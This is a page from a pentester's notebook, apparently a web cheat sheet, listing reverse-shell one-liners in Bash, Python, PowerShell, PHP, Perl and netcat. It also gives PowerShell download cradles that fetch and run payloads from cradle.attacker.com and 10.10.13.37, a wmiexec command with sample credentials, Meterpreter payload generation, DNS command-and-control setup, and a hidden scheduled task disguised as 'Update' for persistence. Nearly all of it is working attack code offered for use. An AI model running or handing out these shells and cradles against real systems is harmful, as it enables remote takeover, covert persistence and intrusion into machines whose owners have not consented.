Pentester's Promiscuous Notebook
TwitterGitHubBlogSponsor
Search
K
Links

Reverse Shells

Bash

/bin/bash -c '/bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f

Python

IPv4

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);s.close()
import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv("HISTFILE","/dev/null");pty.spawn("/bin/bash");s.close()

IPv6

import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);s.close()
import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv("HISTFILE","/dev/null");pty.spawn("/bin/bash");s.close()

PowerShell

$client = New-Object System.Net.Sockets.TCPClient("10.10.13.37",1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
$socket = new-object System.Net.Sockets.TcpClient("10.10.13.37",1337);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null;
$res = ""
while($stream.DataAvailable -or $read -eq $null) {
$read = $stream.Read($buffer, 0, 1024)
}
$out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
if(!$out.equals("exit")){
$args = "";
if($out.IndexOf(' ') -gt -1){
$args = $out.substring($out.IndexOf(' ')+1);
$out = $out.substring(0,$out.IndexOf(' '));
if($args.split(' ').length -gt 1){
$pinfo = New-Object System.Diagnostics.ProcessStartInfo
$pinfo.FileName = "cmd.exe"
$pinfo.RedirectStandardError = $true
$pinfo.RedirectStandardOutput = $true
$pinfo.UseShellExecute = $false
$pinfo.Arguments = "/c $out $args"
$p = New-Object System.Diagnostics.Process
$p.StartInfo = $pinfo
$p.Start() | Out-Null
$p.WaitForExit()
$stdout = $p.StandardOutput.ReadToEnd()
$stderr = $p.StandardError.ReadToEnd()
if ($p.ExitCode -ne 0) {
$res = $stderr
} else {
$res = $stdout
}
}
else{
$res = (&"$out" "$args") | out-string;
}
}
else{
$res = (&"$out") | out-string;
}
if($res -ne $null){
$writer.WriteLine($res)
}
}
}While (!$out.equals("exit"))
$writer.close();
$socket.close();
$stream.Dispose()
#$a=New-Object System.Net.Sockets.TcpClient("10.10.13.37",1337);if($a -eq $null){exit 1}$b=$a.GetStream();$c=New-Object System.IO.StreamWriter($b);$d=New-Object System.Byte[] 1024;$e=New-Object System.Text.AsciiEncoding;do{$c.Flush();$f=$null;$g="";while($b.DataAvailable -or $f -eq $null) {$f=$b.Read($d,0,1024)}$h=$e.GetString($d,0,$f).Replace("`r`n","").Replace("`n","");if(!$h.equals("exit")){$i="";if($h.IndexOf(" ") -gt -1){$i=$h.Substring($h.IndexOf(" ")+1);$h=$h.Substring(0,$h.IndexOf(" "));if($i.Split(" ").Length -gt 1){$k=New-Object System.Diagnostics.ProcessStartInfo;$k.FileName="cmd.exe";$k.RedirectStandardError=$true;$k.RedirectStandardOutput=$true;$k.UseShellExecute=$false;$k.Arguments="/c $h $i";$p=New-Object System.Diagnostics.Process;$p.StartInfo=$k;$p.Start()|Out-Null;$p.WaitForExit();$l=$p.StandardOutput.ReadToEnd();$m=$p.StandardError.ReadToEnd();if($p.ExitCode -ne 0){$g=$m}else{$g=$l}}else{$g=(&"$h" "$i")|Out-String;}}else{$g=(&"$h")|Out-String;}if($g -ne $null){$c.WriteLine($g)}}}while(!$h.equals("exit"))$c.close();$a.close();$b.Dispose()

Download Cradles

PowerShell DNS Delivery

'powershell $a=""""http://10.10.13.37/payload.txt"""";iex(Resolve-DnsName """"cradle.attacker.com"""" 16).Strings[0]'
wmiexec.py -silentcommand -nooutput megacorp.local/snovvcrash:'Passw0rd!'@PC01.megacorp.local 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $url=""""http://10.10.13.37/run.ps1"""";iex(resolve-dnsname """"cradle.attacker.com"""" 16).strings[0];Invoke-RunPayload http://10.10.13.37/payload.txt'

PHP

<?php echo passthru("/bin/bash -c '/bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'"); ?>

Perl

use Socket;$i="<LHOST>";$p=<LPORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};

C

C#

Netcat

$ {nc.tradentional|nc|ncat|netcat} <LHOST> <LPORT> {-e|-c} /bin/bash

Meterpreter

unicorn

$ python3 unicorn.py windows/meterpreter/reverse_https 10.10.13.37 443
$ sudo msfconsole -qr unicorn.rc
PS > IEX(New-Object Net.WebClient).DownloadString('powershell_attack.txt')

Listeners

$ {nc.tradentional|nc|ncat|netcat} [-6] -lvnp <LPORT>

Transport over DNS

dnscat2

chashell

Buy and configure DNS (e. g., c2cdomain.net):
A * -> <IP>
A @ -> <IP>
A chashell -> <IP>
NS c -> chashell.c2cdomain.net
Get dependencies:
$ export GOPATH=/home/snovvcrash/code/go
$ export PATH=$GOPATH:$GOPATH/bin:$PATH
$ go get -v -u github.com/golang/dep/cmd/dep
$ go get github.com/mitchellh/gox
$ cd $GOPATH/src/github.com/golang/dep
$ go install ./...
Clone chashell into $GOPATH/src (otherwise, dep will error out):
$ git clone https://github.com/sysdream/chashell $GOPATH/src/chashell
$ cd $GOPATH/src/chashell
Build binaries:
$ export ENCRYPTION_KEY=$(python -c 'from os import urandom; print(urandom(32).encode("hex"))')
$ export DOMAIN_NAME=c.c2cdomain.net
$ make build-all OSARCH="linux/amd64"
Run server on Attacker:
$ cd release/
$ sudo systemctl stop systemd-resolved
$ sudo ./chaserv_linux_amd64
Run client on Victim:
$ ./chashell_linux_amd64

Tools

VbRev

xc

Listen:
$ rlwrap ./xc -l -p 443
Launch:
PS > Start-Process -NoNewWindow .\xc.exe "10.10.13.38 443"

cliws

Reverse mode:
$ rlwrap -cAr ./cliws -l 8000
Cmd > .\cliws.exe -r ws://10.10.13.37:8000 powershell
Create a scheduled task for persistence:
$ while true; do sudo netstat -tulpan | grep LISTEN | grep 8080 > /dev/null || rlwrap -cAr ./cliws -l 8080; done
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Hours 1)
$settings = New-ScheduledTaskSettingsSet -Hidden -MultipleInstances Queue
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-WindowStyle Hidden C:\Windows\Tasks\cliws.exe -r ws://10.10.13.37:8080 powershell"
Register-ScheduledTask -TaskName "Update" -Trigger $trigger -Settings $settings -Action $action

winssh

Last modified 18d ago